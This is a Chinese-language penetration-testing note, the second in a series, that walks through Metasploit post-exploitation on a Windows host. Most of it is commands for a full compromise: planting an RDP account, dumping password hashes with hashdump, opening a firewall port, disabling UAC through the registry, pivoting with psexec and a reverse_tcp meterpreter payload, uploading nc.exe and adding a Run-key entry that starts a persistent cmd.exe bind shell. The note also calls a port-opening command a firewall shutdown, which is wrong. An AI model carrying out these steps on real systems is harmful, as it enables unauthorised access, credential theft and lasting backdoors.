渗透测试笔记(二)
一、第二次启动msf
第二次启动msf可以直接使用msfconsole
命令
1 | msfconsole |
按上次的操作选用攻击工具进入meterpreter界面
二、植入账号密码
使用run post/windows/manage/enable_rdp USERNAME=liz PASSWORD=123456
向目标机植入账号密码
1 | run post/windows/manage/enable_rdp USERNAME=liz PASSWORD=123456 |
此处因为已经植入过,所以会出现[-]报错
此时可以开另一个终端输入rdesktop + 目标主机ip
,以此远程连接目标机桌面
1 | rdesktop <目标主机ip> |
使用hashdump
查询目标机所有加密后的账号密码,这里需要找到我们自己添加的那个账号的密码
1 | hashdump |
三、进入shell获取进一步权限
输入shell
获取目标机权限(相当于在终端骇入目标机)
1 | shell |
乱码可以输入:chcp 65001
解决乱码
1 | chcp 65001 |
并输入netsh firewall add portopening TCP 4444 "liz" ENABLE ALL
关闭目标机防火墙
1 | netsh firewall add portopening TCP 4444 "liz" ENABLE ALL |
输入下面的命令关闭目标主机的UAC
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVerion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
UAC概述:用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果
1 | cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVerion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f |
输入下面的命令允许本地管理员账户在远程连接时拥有完整权限
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
1 | cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f |
输入命令exit
退出,正常流程一般需要退出三次,看到退出至meterpreter界面即可
1 | exit |
四、上传后门程序
输入background
后出现session字样即退回攻击工具界面
1 | background |
使用另一个攻击工具use exploit/windows/smb/psexec
后show options
先设置payload:set payload windows/meterpreter/reverse_tcp
1 | use exploit/windows/smb/psexec |
设置好RHOST、SMBUSER、SMBPASS、SMBDOMAIN分别为目标主机ip,先前植入的用户名,与利用hashdump
查出的加密后的植入的密码,和WORKGROUP,然后run运行
1 | set RHOST <目标主机ip> |
如果写错了,可以使用unset <输入错的项>
来撤销输入
运行成功,上传后门程序upload /usr/share/windows-binaries/nc.exe C:\\windows
1 | upload /usr/share/windows-binaries/nc.exe C:\\windows |
此处因为已向目标主机植入过后门程序,所以提示文件被占用
设置目标主机开机自启动后门程序 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'
1 | reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe' |
此时再输入shutdown –r –f –t 0
,即可使目标机直接关机
1 | shutdown –r –f –t 0 |